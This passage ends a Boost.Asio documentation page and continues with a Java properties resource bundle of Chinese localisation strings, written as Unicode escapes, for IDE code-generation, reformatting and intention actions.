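  }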
\n\n\n\n
Copyright © 2003-2019 Christopher M. Kohlhoff

\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n

\n
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n\n\n"} {"text": "error.hint.file.is.readonly=\\u6587\\u4ef6 {0} \\u662f\\u53ea\\u8bfb\\u7684\nerror.dialog.readonly.file.title=\\u6587\\u4ef6\\u662f\\u53ea\\u8bfb\\u7684\nerror.dialog.readonly.files.title=\\u65e0\\u6cd5\\u4fee\\u6539\\u53ea\\u8bfb\\u6587\\u4ef6\nerror.dialog.readonly.files.message={0} \\u5305\\u542b\\u53ea\\u8bfb\\u6587\\u4ef6\\u3002\\n\\u5904\\u7406\\u6240\\u6709\\u5176\\u4ed6(\\u53ef\\u5199)\\u6587\\u4ef6\\uff1f\nreformat.directory.dialog.options=\\u9009\\u9879\nreformat.directory.dialog.filters=\\u8fc7\\u6ee4\\u5668\nprocess.scope.directory=\\u76ee\\u5f55 ''{0}''\nprocess.scope.project=\\u9879\\u76ee ''{0}''\nprocess.scope.module=\\u6a21\\u5757 ''{0}''\nprocess.scope.changed.files=\\u53ea\\u5904\\u7406 VCS \\u66f4\\u6539\\u7684\\u6587\\u4ef6\nreformat.code.accept.button.text=Run\nprocess.scope.file=\\u6587\\u4ef6 {0}(&F)\nreformat.option.selected.text=\\u6240\\u9009\\u6587\\u672c(&S)\nreformat.option.all.files.in.directory=\\u76ee\\u5f55 {0} \\u4e2d\\u7684\\u6240\\u6709\\u6587\\u4ef6(&A)\nreformat.option.include.subdirectories=\\u5305\\u542b\\u5b50\\u76ee\\u5f55(&I)\nreformat.option.optimize.imports=\\u4f18\\u5316\\u5bfc\\u5165(&O)\nreformat.option.code.cleanup=\\u6e05\\u7406\\u4ee3\\u7801(&C)\nreformat.option.rearrange.entries=\\u91cd\\u65b0\\u6392\\u5e8f\\u6761\\u76ee(&R)\nreformat.option.vcs.changed.region=\\u4ec5 VCS \\u6539\\u53d8\\u7684\\u6587\\u672c(&V)\nreformat.progress.file.with.known.name.text=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316 {0}\nreformat.and.optimize.progress.common.text=\\u51c6\\u5907\\u5bfc\\u5165...\nreformat.progress.common.text=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801...\nconfigure.code.style.on.fragment.dialog.title=\\u8c03\\u6574\\u4ee3\\u7801\\u6837\\u5f0f\\u8bbe\\u7f6e\nconfigure.code.style.on.fragment.dialog.cancel=\\u8df3\\u8fc7\nconfigure.code.style.on.fragment.dialog.progress.text=\\u5f71\\u54cd\\u9009\\u5b9a\\u4ee3\\u7801\\u7247\\u6bb5\\u7684\\u8fc7\\u6ee4\\u8bbe\\u7f6e...\nconfigure.code.style.on.fragment.dialog.progress.text.under=\\u6309 '\\u8df3\\u8fc7' 
\\u663e\\u793a\\u6240\\u6709\\u8bbe\\u7f6e\nprocess.optimize.imports=\\u4f18\\u5316\\u5bfc\\u5165\nprocess.optimize.imports.before.commit=\\u63d0\\u4ea4\\u524d\\u4f18\\u5316\\u5bfc\\u5165\nprogress.text.optimizing.imports=\\u4f18\\u5316\\u5bfc\\u5165...\nprogress.reformat.and.optimize.common.command.text=\\u683c\\u5f0f\\u5316\\u53ca\\u4f18\\u5316\\u5bfc\\u5165\nprogress.reformat.stage.wrapping.blocks=\\u51c6\\u5907\\u4e2d...\nprogress.reformat.stage.processing.blocks=\\u8ba1\\u7b97\\u66f4\\u6539...\nprogress.reformat.stage.applying.changes=\\u5b58\\u50a8\\u66f4\\u6539...\nprogress.reformat.stage.expanding.children.indents=\\u6269\\u5927\\u5fc5\\u8981\\u7684\\u5b50\\u9879\\u7f29\\u8fdb\nprocess.cleanup.code=\\u6e05\\u7406\\u4ee3\\u7801...\nprocess.rearrange.code=\\u91cd\\u65b0\\u6392\\u5217\\u4ee3\\u7801...\nprocess.reformat.code=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801\nprocess.reformat.code.before.commit=\\u63d0\\u4ea4\\u524d\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801\nprocess.rearrange.code.before.commit=\\u63d0\\u4ea4\\u4e4b\\u524d\\u91cd\\u65b0\\u6392\\u5217\\u4ee3\\u7801\ndialog.reformat.files.title=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u6587\\u4ef6\ndialog.reformat.files.optimize.imports.checkbox=\\u4f18\\u5316\\u5bfc\\u5165(&O)\ndialog.reformat.files.reformat.selected.files.label=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u6240\\u9009\\u6587\\u4ef6\\uff1f\ncommand.name.typing=\\u8f93\\u5165\ndialog.import.on.paste.title=\\u9009\\u62e9\\u8981\\u5bfc\\u5165\\u7684\\u7c7b\ndialog.import.on.paste.title2=\\u9009\\u62e9\\u8981\\u5bfc\\u5165\\u7684\\u5143\\u7d20\ndialog.import.on.paste.title3=\\u9009\\u62e9\\u8981\\u79fb\\u9664\\u7684\\u5bfc\\u5165\ndialog.paste.on.import.text=\\u60a8\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u4f7f\\u7528\\u7684\\u662f\\u5728\\u65b0\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5bfc\\u5165\\u65f6\\u4e0d\\u53ef\\u8bbf\\u95ee\\u7684\\u7c7b\\u3002
\\u9009\\u62e9\\u60a8\\u8981\\u5bfc\\u5165\\u5230\\u65b0\\u6587\\u4ef6\\u7684\\u7c7b\\u3002\ndialog.paste.on.import.text2=\\u60a8\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u4f7f\\u7528\\u7684\\u662f\\u5728\\u65b0\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5bfc\\u5165\\u65f6\\u4e0d\\u53ef\\u8bbf\\u95ee\\u7684\\u5143\\u7d20\\u3002
\\u9009\\u62e9\\u60a8\\u8981\\u5bfc\\u5165\\u5230\\u65b0\\u6587\\u4ef6\\u7684\\u5143\\u7d20\\u3002\ndialog.paste.on.import.text3=\\u7c98\\u8d34\\u7684\\u4ee3\\u7801\\u7247\\u6bb5\\u5728\\u5f53\\u524d\\u4e0a\\u4e0b\\u6587\\u4e2d\\u5f15\\u5165\\u4e86\\u65b0\\u7684\\u5bfc\\u5165\\u3002
\\u9009\\u62e9\\u8981\\u5220\\u9664\\u7684\\u5bfc\\u5165\\u3002\ncopy.paste.reference.notification={0} \\u5bfc\\u5165\\u88ab\\u6dfb\\u52a0

\\u67e5\\u770b\\u6dfb\\u52a0\\u7684\\u5bfc\\u5165...\npaste.data.flavor.folding=\\u6298\\u53e0\\u6570\\u636e\npaste.dataflavor.referencedata=\\u53c2\\u8003\\u6570\\u636e\ngenerate.constructor.fields.chooser.title=\\u9009\\u62e9\\u7531\\u6784\\u9020\\u65b9\\u6cd5\\u521d\\u59cb\\u5316\\u7684\\u5b57\\u6bb5\nerror.attempt.to.generate.constructor.for.anonymous.class=\\u65e0\\u6cd5\\u5411\\u533f\\u540d\\u7c7b\\u6dfb\\u52a0\\u6784\\u9020\\u51fd\\u6570\ngenerate.constructor.super.constructor.chooser.title=\\u9009\\u62e9\\u8d85\\u7c7b\\u6784\\u9020\\u51fd\\u6570\ngenerate.delegate.method.chooser.title=\\u9009\\u62e9\\u751f\\u6210\\u4ee3\\u7406\\u7684\\u65b9\\u6cd5\ngenerate.delegate.target.chooser.title=\\u9009\\u62e9\\u8981\\u751f\\u6210\\u4ee3\\u7406\\u7684\\u76ee\\u6807\ngenerate.equals.and.hashcode.already.defined.warning=\\u65b9\\u6cd5 ''boolean equals(Object)'' \\u548c ''int hashCode()'' \\u5df2\\u7ecf\\u5728\\u7c7b {0} \\u4e2d\\u5b9a\\u4e49\\u4e86\\u3002\\u8981\\u5220\\u9664\\u5b83\\u4eec\\u5e76\\u7ee7\\u7eed\\u5417\\uff1f\ngenerate.equals.and.hashcode.already.defined.warning.anonymous=\\u65b9\\u6cd5 'boolean equals(Object)' \\u548c 'int hashCode()' \\u5df2\\u7ecf\\u5728\\u8be5\\u533f\\u540d\\u7c7b\\u4e2d\\u5b9a\\u4e49\\u4e86\\u3002\\u8981\\u5220\\u9664\\u5b83\\u4eec\\u5e76\\u7ee7\\u7eed\\u5417\\uff1f\ngenerate.equals.and.hashcode.already.defined.title=\\u751f\\u6210 equals() \\u548c hashCode()\ngenerate.equals.and.hashcode.error.no.object.class.message=\\u4e0d\\u80fd\\u751f\\u6210 equals() \\u548c hashCode()\\u3002\\n\\u627e\\u4e0d\\u5230 java.lang.Object \\u7c7b\\u3002\ngenerate.equals.and.hashcode.error.no.object.class.title=\\u6ca1\\u6709 java.lang.Object\ngenerate.equals.compare.nested.arrays.comment= // \\u5728\\u8fd9\\u91cc\\u6bd4\\u8f83\\u5d4c\\u5957\\u6570\\u7ec4 - {0} \\u7684\\u503c\ngenerate.equals.compare.arrays.comment= // \\u53ef\\u80fd\\u4e0d\\u6b63\\u786e - \\u6bd4\\u8f83 Object[] \\u6570\\u7ec4\\u4f7f\\u7528 Arrays.equals\ngenerate.getter.setter.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Getter \\u548c Setter\ngenerate.getter.fields.chooser.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Getter\ngenerate.setter.fields.chooser.title=\\u9009\\u62e9\\u5b57\\u6bb5\\u4ee5\\u751f\\u6210 Setter\ngenerate.setter.template=Setter \\u6a21\\u677f:(&S)\ngenerate.getter.template=Getter \\u6a21\\u677f:(&G)\noverride.implement.broken.file.template.message=\\u8bf7\\u66f4\\u6b63 \"Overridden/Implemented Method Body\" \\u6a21\\u677f\noverride.implement.broken.file.template.title=\\u6587\\u4ef6\\u6a21\\u677f\\u9519\\u8bef\nmethods.to.implement.chooser.title=\\u9009\\u62e9\\u8981\\u5b9e\\u73b0\\u7684\\u65b9\\u6cd5\nmethods.to.override.chooser.title=\\u9009\\u62e9\\u8981\\u91cd\\u5199\\u7684\\u65b9\\u6cd5\nmethods.to.override.implement.chooser.title=\\u9009\\u62e9\\u8986\\u76d6/\\u5b9e\\u73b0\\u7684\\u65b9\\u6cd5\ngenerate.list.popup.title=\\u751f\\u6210\nsurround.with.cast.template=((Type)expr)\nsurround.with.dowhile.template=do / while\nsurround.with.for.template=for\nsurround.with.ifelse.expression.template=if (expr) {...} else {...}\nsurround.with.ifelse.template=if / else\nsurround.with.if.expression.template=if (expr) {...}\nsurround.with.if.template=if\nsurround.with.not.instanceof.template=!(expr instanceof Type)\nsurround.with.not.template=!(expr)\nsurround.with.parenthesis.template=!(expr)\nsurround.with.runnable.template=Runnable\nsurround.with.synchronized.template=synchronized\nsurround.with.try.catch.finally.template=try / catch / 
finally\nsurround.with.try.catch.template=try / catch\nsurround.with.try.catch.incorrect.template.message=Catch Body \\u65e0\\u6548\\u7684\\u6587\\u4ef6\\u6a21\\u677f\nsurround.with.try.catch.incorrect.template.title=\\u7528 Try / Catch \\u5305\\u56f4\nsurround.with.try.finally.template=try / finally\nsurround.with.while.template=while\nsurround.with.runtime.type.template=((RuntimeType)expr)\nsurround.with.chooser.title=\\u5305\\u56f4\nunwrap.popup.title=\\u9009\\u62e9\\u8bed\\u53e5\\u89e3\\u9664\\u5305\\u56f4/\\u5220\\u9664\nunwrap.if=\\u89e3\\u5f00 'if...'\nunwrap.else=\\u89e3\\u5f00 'else...'\nremove.else=\\u79fb\\u9664 'else...'\nunwrap.while=\\u89e3\\u5f00 'while...'\nunwrap.for=\\u89e3\\u5f00 'for...'\nunwrap.braces=\\u89e3\\u5f00\\u62ec\\u53f7\nunwrap.try=\\u89e3\\u5f00 'try...'\nunwrap.conditional=\\u89e3\\u5f00 'f ?a : b'\nremove.catch=\\u79fb\\u9664 'catch...'\nunwrap.array.initializer=\\u89e3\\u5f00\\u6570\\u7ec4\\u521d\\u59cb\\u5316\nunwrap.synchronized=\\u89e3\\u5f00 'synchronized...'\nunwrap.with.placeholder=\\u89e3\\u5f00 ''{0}''\nunwrap.anonymous=\\u89e3\\u5f00 'anonymous...'\nunwrap.lambda=\\u89e3\\u5f00 'lambda...'\ngenerate.equals.hashcode.wizard.title=\\u751f\\u6210 equals() \\u548c hashCode()\ngenerate.equals.hashcode.equals.fields.chooser.title=\\u9009\\u62e9\\u8981\\u5305\\u542b\\u5728 equals() \\u4e2d\\u7684\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.hashcode.fields.chooser.title=\\u9009\\u62e9\\u8981\\u5305\\u542b\\u5728 hashCode() \\u4e2d\\u7684\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.non.null.fields.chooser.title=\\u9009\\u62e9\\u6240\\u6709\\u975e\\u7a7a\\u5b57\\u6bb5(&F)\ngenerate.equals.hashcode.use.getters=\\u5728\\u4ee3\\u7801\\u751f\\u6210\\u671f\\u95f4\\u4f7f\\u7528 getter(&G)\ngenerate.equals.hashcode.template=\\u6a21\\u677f:(&T)\ngenerate.equals.hashcode.accept.sublcasses=\\u63a5\\u53d7\\u5b50\\u7c7b\\u4f5c\\u4e3a equals() \\u65b9\\u6cd5\\u7684\\u53c2\\u6570(&S)\ngenerate.equals.hashcode.accept.sublcasses.explanation=\\u867d\\u7136\\u5728 Object.equals() \\u7684\\u89c4\\u8303\\u901a\\u5e38\\u4e0d\\u63a5\\u53d7\\u5b50\\u7c7b\\uff0c
\\u4f46\\u4e3a\\u4e86\\u5728\\u6846\\u67b6\\u80fd\\u6b63\\u5e38\\u5de5\\u4f5c\\uff0c\\u63a5\\u53d7\\u5b50\\u7c7b\\u53ef\\u80fd\\u662f\\u5fc5\\u987b\\u7684\\u3002
\\u5c31\\u50cf Hibernate \\u751f\\u6210\\u4ee3\\u7406\\u5b50\\u7c7b\\u4e00\\u6837\\u3002\ngenerate.equals.hashcode.internal.error=\\u5185\\u90e8\\u9519\\u8bef\ngenerate.equals.warning.equals.for.nested.arrays.not.supported=equals() \\u4e0d\\u652f\\u6301\\u5d4c\\u5957\\u7684\\u6570\\u7ec4\ngenerate.equals.warning.generated.equals.could.be.incorrect=\\u4e3a Object []\\u751f\\u6210\\u7684 equals() \\u53ef\\u80fd\\u4e0d\\u6b63\\u786e\ngenerate.equals.hashcode.warning.hashcode.for.arrays.is.not.supported=hashCode() \\u4e0d\\u652f\\u6301\\u6570\\u7ec4\nhighlight.thrown.exceptions.chooser.all.entry=\\u6240\\u6709\\u5217\\u51fa\\u7684\nhighlight.exceptions.thrown.chooser.title=\\u9009\\u62e9\\u5f02\\u5e38\\u7c7b\\u4ee5\\u9ad8\\u4eae\\u663e\\u793a\nhighlight.exceptions.thrown.notfound=\\u627e\\u4e0d\\u5230\\u65b9\\u6cd5\\u4e2d\\u629b\\u51fa\\u5f02\\u5e38\nstatus.bar.exit.points.highlighted.message={0} \\u4e2a\\u9000\\u51fa\\u70b9\\u9ad8\\u4eae (\\u518d\\u6309 {1} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.message=\\u627e\\u5230 {1} \\u7684 {0} \\u4e2a\\u4f7f\\u7528 (\\u518d\\u6309 {2} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.no.target.message=\\u627e\\u5230 {0} \\u4e2a\\u4f7f\\u7528 (\\u518d\\u6309 {2} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.overridden.methods.highlighted.message=\\u627e\\u5230 {0} \\u4e2a\\u91cd\\u5199\\u65b9\\u6cd5 (\\u518d\\u6309 {1} \\u79fb\\u9664\\u9ad8\\u4eae\\uff0c\\u6309 Esc \\u79fb\\u9664\\u6240\\u6709\\u9ad8\\u4eae)\nstatus.bar.highlighted.usages.not.found.message=\\u6ca1\\u6709\\u627e\\u5230 {0} \\u7684\\u7528\\u6cd5\nstatus.bar.highlighted.usages.not.found.no.target.message=\\u6ca1\\u6709\\u627e\\u5230\\u7528\\u6cd5\nparameter.info.no.parameters=<\\u65e0\\u53c2\\u6570>\nxml.tag.info.no.attributes=<\\u65e0\\u5c5e\\u6027>\nn.of.m={0} / {1}\nquick.definition.back=\\u540e\\u9000\nquick.definition.forward=\\u5411\\u524d\nquick.definition.edit.source=\\u7f16\\u8f91\\u6e90\\u7801\nquick.definition.show.source=\\u663e\\u793a\\u6e90\\u7801\ni18n.quickfix.property.panel.title=\\u5c5e\\u6027\\u4fe1\\u606f\ni18n.quickfix.property.panel.update.all.files.in.bundle.checkbox=\\u66f4\\u65b0\\u8d44\\u6e90\\u5305\\u4e2d\\u7684\\u6240\\u6709\\u5c5e\\u6027\\u6587\\u4ef6(&R)\ni18n.quickfix.property.panel.properties.file.label=\\u5c5e\\u6027\\u6587\\u4ef6:(&P)\ni18n.quickfix.property.panel.property.value.label=\\u5c5e\\u6027\\u503c:(&V)\ni18n.quickfix.property.panel.property.key.label=\\u5c5e\\u6027\\u952e:(&K)\ni18n.quickfix.code.panel.title=Java \\u4ee3\\u7801\\u4fe1\\u606f\ni18n.quickfix.code.panel.resource.bundle.expression.label=\\u8d44\\u6e90\\u5305\\u8868\\u8fbe\\u5f0f\\uff1a(&E)\ni18n.quickfix.preview.panel.title=Preview\nquickfix.i18n.concatentation=\\u56fd\\u9645\\u5316\\u5b57\\u7b26\\u4e32\\u5305\\u542b\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\\u7684\\u8fde\\u63a5\nquickfix.i18n.concatentation.error=\\u5b57\\u7b26\\u4e32\\u8fde\\u63a5\\u6ca1\\u6709\\u627e\\u5230\nquickfix.i18n.command.name=\\u56fd\\u9645\\u5316\ninspection.i18n.display.name=\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\ninspection.i18n.option.ignore.assert=\\u5ffd\\u7565 assert \\u8bed\\u53e5\\u53c2\\u6570\ninspection.i18n.option.ignore.for.exception.constructor.arguments=\\u5ffd\\u7565 exception 
\\u6784\\u9020\\u51fd\\u6570\\u53c2\\u6570:\ninspection.i18n.option.ignore.for.specified.exception.constructor.arguments=\\u5ffd\\u7565\\u6307\\u5b9a\\u7684\\u5f02\\u5e38\\u6784\\u9020\\u51fd\\u6570\\u7684\\u53c2\\u6570\ninspection.i18n.option.ignore.for.junit.assert.arguments=\\u5ffd\\u7565 JUnit \\u65ad\\u8a00\\u53c2\\u6570\ninspection.i18n.option.ignore.qualified.class.names=\\u5ffd\\u7565\\u503c\\u4e0e\\u73b0\\u6709\\u5b8c\\u5168\\u9650\\u5b9a\\u7c7b\\u540d\\u76f8\\u7b49\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.property.keys=\\u5ffd\\u7565\\u503c\\u4e0e\\u73b0\\u6709\\u5c5e\\u6027\\u952e\\u540d\\u76f8\\u7b49\\u7684\\u6587\\u5b57\ninspection.i18n.option.ignore.nonalphanumerics=\\u5ffd\\u7565\\u4e0d\\u5305\\u542b\\u5b57\\u6bcd\\u5b57\\u7b26\\u7684\\u6587\\u5b57\ninspection.i18n.quickfix=\\u56fd\\u9645\\u5316\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32\ninspection.i18n.message.general.with.value=\\u786c\\u7f16\\u7801\\u5b57\\u7b26\\u4e32:{0}\ninspection.unresolved.property.key.reference.name=\\u65e0\\u6548\\u5c5e\\u6027\\u5065\ninspection.unresolved.property.key.reference.message=\\u5b57\\u7b26\\u4e32\\u6587\\u5b57 ''{0}'' \\u4e0d\\u662f\\u6709\\u6548\\u7684\\u5c5e\\u6027\\u952e\ninspection.invalid.resource.bundle.reference=\\u65e0\\u6548\\u7684\\u8d44\\u6e90\\u5305\\u5f15\\u7528 ''{0}''\ni18nize.dialog.title=\\u56fd\\u9645\\u5316\\u786c\\u7f16\\u7801\\u5b57\\u7b26\ni18nize.dialog.error.jdk.message=\\u627e\\u4e0d\\u5230\\u7c7b 'java.util.ResourceBundle' \\u3002\\n\\u8bf7\\u8bbe\\u7f6e\\u6b63\\u786e\\u7684 JDK\\u3002\ni18nize.dialog.error.jdk.title=\\u7c7b\\u672a\\u627e\\u5230\ni18nize.dialog.property.file.chooser.title=\\u9009\\u62e9\\u5c5e\\u6027\\u6587\\u4ef6\ni18nize.dialog.template.link.label=\\u7f16\\u8f91\\u56fd\\u9645\\u5316\\u6a21\\u677f\ni18nize.dialog.error.property.already.defined.message=\\u6587\\u4ef6 ''{1}'' \\u4e2d\\u5df2\\u5b58\\u5728\\u5c5e\\u6027 ''{0}''\\u3002\\u8986\\u76d6\\u5b83\\u7684\\u503c\\uff1f\ni18nize.dialog.error.property.already.defined.title=\\u5c5e\\u6027\\u5df2\\u7ecf\\u5b58\\u5728\nintention.split.declaration.family=\\u62c6\\u5206\\u58f0\\u660e\nintention.split.declaration.assignment.text=\\u62c6\\u5206\\u4e3a\\u58f0\\u660e\\u548c\\u8d4b\\u503c\nintention.split.if.family=\\u62c6\\u5206 'if'\nintention.split.if.text=\\u62c6\\u5206\\u4e3a2\\u4e2a If\nintention.split.filter.text=\\u62c6\\u5206\\u4e3a\\u8fc7\\u6ee4\\u5668\\u94fe\nintention.split.filter.family=\\u62c6\\u5206\\u8fc7\\u6ee4\\u5668\nintention.merge.filter.text=\\u5408\\u5e76\\u8fc7\\u6ee4\\u5668\\u94fe\nintention.merge.filter.family=\\u5408\\u5e76\\u8fc7\\u6ee4\\u5668\nintention.inline.map.inline.text=\\u5185\\u8054 ''{0}'' \\u4e3b\\u4f53\\u8fdb\\u5165\\u4e0b\\u4e00\\u4e2a ''{1}'' \\u8c03\\u7528\nintention.inline.map.merge.text=\\u5408\\u5e76 ''{0}'' \\u8c03\\u7528\\u548c ''{1}'' \\u8c03\\u7528\nintention.inline.map.family=\\u5185\\u8054\\u6d41\\u6620\\u5c04\\u65b9\\u6cd5\nintention.extract.map.step.family=\\u63d0\\u53d6\\u5230\\u5355\\u72ec\\u7684\\u6620\\u5c04\\u65b9\\u6cd5\nintention.extract.map.step.text=\\u63d0\\u53d6\\u53d8\\u91cf ''{0}'' \\u5230 ''{1}'' \\u64cd\\u4f5c\nintention.compose.function.text=\\u7528 andThen 
\\u8c03\\u7528\\u66ff\\u6362\\u5d4c\\u5957\\u51fd\\u6570\\u8c03\\u7528\nintention.compose.function.family=\\u7528\\u7ec4\\u5408\\u66ff\\u6362\\u5d4c\\u5957\\u51fd\\u6570\\u8c03\\u7528\nintention.introduce.variable.text=\\u5f15\\u5165\\u5c40\\u90e8\\u53d8\\u91cf\nintention.extract.method.text=\\u63d0\\u53d6\\u65b9\\u6cd5\nintention.encapsulate.field.text=\\u5c01\\u88c5\\u5b57\\u6bb5\nintention.implement.abstract.method.family=\\u5b9e\\u73b0\\u62bd\\u8c61\\u65b9\\u6cd5\nintention.implement.abstract.method.text=\\u5b9e\\u73b0\\u65b9\\u6cd5 ''{0}''\nintention.override.method.text=\\u91cd\\u5199\\u65b9\\u6cd5 ''{0}''\nintention.add.annotation.family=\\u6dfb\\u52a0\\u6ce8\\u89e3\nintention.add.on.demand.static.import.family=\\u6dfb\\u52a0\\u6309\\u9700\\u9759\\u6001\\u5bfc\\u5165\nintention.add.on.demand.static.import.text=\\u4e3a\\u201c{0}\\u201d\\u6dfb\\u52a0\\u6309\\u9700\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.static.import.family=\\u6dfb\\u52a0\\u5355\\u4e2a\\u6210\\u5458\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.static.import.text=\\u4e3a ''{0}'' \\u6dfb\\u52a0\\u9759\\u6001\\u5bfc\\u5165\nintention.use.single.member.static.import.text=\\u4e3a ''{0}'' \\u4f7f\\u7528\\u9759\\u6001\\u5bfc\\u5165\nintention.add.single.member.import.text=\\u4e3a ''{0}'' \\u6dfb\\u52a0\\u5bfc\\u5165\nintention.add.explicit.type.arguments.family=\\u6dfb\\u52a0\\u663e\\u5f0f\\u7684\\u7c7b\\u578b\\u53c2\\u6570\nintention.replace.concatenation.with.formatted.output.family=\\u7528\\u683c\\u5f0f\\u5316\\u8f93\\u51fa\\u66ff\\u6362\\u8fde\\u63a5\nintention.replace.concatenation.with.formatted.output.text=\\u7528 'java.text.MessageFormat.format()' \\u66ff\\u6362 '+'\nintention.color.chooser.dialog=\\u9009\\u62e9\\u989c\\u8272\nintention.convert.to.basic.latin=\\u8f6c\\u6362\\u4e3a\\u57fa\\u672c\\u7684\\u62c9\\u4e01\nintention.surround.resource.with.ARM.block=\\u7528 try-with-resources \\u5305\\u56f4\nintention.surround.with.ARM.block.template='try-with-resources'\ndialog.create.field.from.parameter.title=\\u521b\\u5efa\\u5b57\\u6bb5\ndialog.create.field.from.parameter.already.exists.text=\\u4f7f\\u7528\\u73b0\\u6709\\u5b57\\u6bb5 ''{0}''\\uff1f\ndialog.create.field.from.parameter.already.exists.title=\\u5b57\\u6bb5\\u5df2\\u7ecf\\u5b58\\u5728\ndialog.create.field.from.parameter.field.type.label=\\u5b57\\u6bb5\\u7684\\u7c7b\\u578b:\ndialog.create.field.from.parameter.field.name.label=Name:\ndialog.create.field.from.parameter.declare.final.checkbox=\\u58f0\\u660e final(&F)\ndialog.create.class.destination.package.label=\\u76ee\\u6807\\u5305\\uff1a\ndialog.create.class.package.chooser.title=\\u9009\\u62e9\\u76ee\\u6807\\u5305\ncreate.directory.command=\\u521b\\u5efa\\u76ee\\u5f55\ndialog.create.class.label=\\u521b\\u5efa {0}:\ndialog.create.class.name=\\u521b\\u5efa {0} {1}\nintention.implement.abstract.class.family=\\u5b9e\\u73b0\\u62bd\\u8c61\\u7c7b\\u6216\\u63a5\\u53e3\nintention.implement.abstract.class.default.text=\\u5b9e\\u73b0\\u62bd\\u8c61\\u7c7b\nintention.implement.abstract.class.interface.text=\\u5b9e\\u73b0\\u63a5\\u53e3\nintention.implement.abstract.class.subclass.text=\\u521b\\u5efa\\u5b50\\u7c7b\nintention.error.cannot.create.class.message=\\u65e0\\u6cd5\\u521b\\u5efa\\u7c7b 
''{0}''\nintention.error.cannot.create.class.title=\\u521b\\u5efa\\u7c7b\\u5931\\u8d25\nintention.assign.field.from.parameter.text=\\u5c06\\u53c2\\u6570\\u5206\\u914d\\u7ed9\\u5b57\\u6bb5\\u201c{0}\\u201d\nintention.assign.field.from.parameter.family=\\u5c06\\u53c2\\u6570\\u5206\\u914d\\u7ed9\\u5b57\\u6bb5\nintention.create.field.from.parameter.text=\\u521b\\u5efa\\u53c2\\u6570 ''{0}'' \\u7684\\u5b57\\u6bb5\nintention.create.field.from.parameter.family=\\u521b\\u5efa\\u5b57\\u6bb5\\u53c2\\u6570\nintention.bind.fields.from.parameters.text=\\u5c06 {0} \\u53c2\\u6570\\u7ed1\\u5b9a\\u5230\\u5b57\\u6bb5\nintention.bind.fields.from.parameters.family=\\u5c06\\u53c2\\u6570\\u7ed1\\u5b9a\\u5230\\u5b57\\u6bb5\nintention.implement.abstract.method.searching.for.descendants.progress=\\u5bfb\\u627e\\u7684\\u540e\\u4ee3...\nintention.implement.abstract.method.error.no.classes.message=\\u6ca1\\u6709\\u627e\\u5230\\u53ef\\u4ee5\\u5b9e\\u73b0\\u6b64\\u65b9\\u6cd5\\u7684\\u7c7b\nintention.implement.abstract.method.error.no.classes.title=\\u6ca1\\u6709\\u627e\\u5230\\u7684\\u7c7b\nintention.implement.abstract.method.class.chooser.title=\\u9009\\u62e9\\u5b9e\\u73b0\\u7c7b\nintention.implement.abstract.method.command.name=\\u5b9e\\u73b0\\u65b9\\u6cd5\nintention.invert.if.condition=\\u53cd\\u8f6c 'if' \\u6761\\u4ef6\nintention.extract.if.condition.text=\\u63d0\\u53d6 if ({0})\nintention.extract.if.condition.family=\\u63d0\\u53d6 if \\u6761\\u4ef6\nintention.underscores.in.literals.family=\\u6570\\u5b57\\u6587\\u5b57\\u4e2d\\u7684\\u4e0b\\u5212\\u7ebf\nintention.remove.literal.underscores=\\u4ece\\u6587\\u5b57\\u4e2d\\u79fb\\u9664\\u4e0b\\u5212\\u7ebf\nintention.insert.literal.underscores=\\u5c06\\u4e0b\\u5212\\u7ebf\\u63d2\\u5165\\u6587\\u5b57\nintention.replace.cast.with.var.text=\\u7528 ''{1}'' \\u66ff\\u6362 ''{0}''\nintention.replace.cast.with.var.family=\\u7528\\u53d8\\u91cf\\u66ff\\u6362 cast\nintention.convert.color.representation.text=\\u8f6c\\u6362\\u4e3a ''new Color{0}''\nintention.convert.color.representation.family=\\u8f6c\\u6362\\u989c\\u8272\\u8868\\u793a\nintention.break.string.on.line.breaks.text=\\u5728 '\\\\n' \\u4e0a\\u65ad\\u5f00\\u5b57\\u7b26\\u4e32\nintention.unwrap.else.branch=\\u89e3\\u5f00 'else' \\u5206\\u652f\nintention.unwrap.else.branch.changes.semantics=\\u89e3\\u5f00 'else' \\u5206\\u652f(\\u6539\\u53d8\\u8bed\\u4e49)\nintention.split.switch.branch.with.several.case.values.family=\\u5c06\\u5177\\u6709\\u591a\\u4e2a case \\u503c\\u7684 switch \\u5206\\u652f\\u62c6\\u5206\\u4e3a\\u5355\\u4e2a\\u7684 switch \\u5206\\u652f\nintention.split.switch.branch.with.several.case.values.copy.text=\\u590d\\u5236 'switch' \\u5206\\u652f\nintention.split.switch.branch.with.several.case.values.split.text=\\u62c6\\u5206 'switch' 
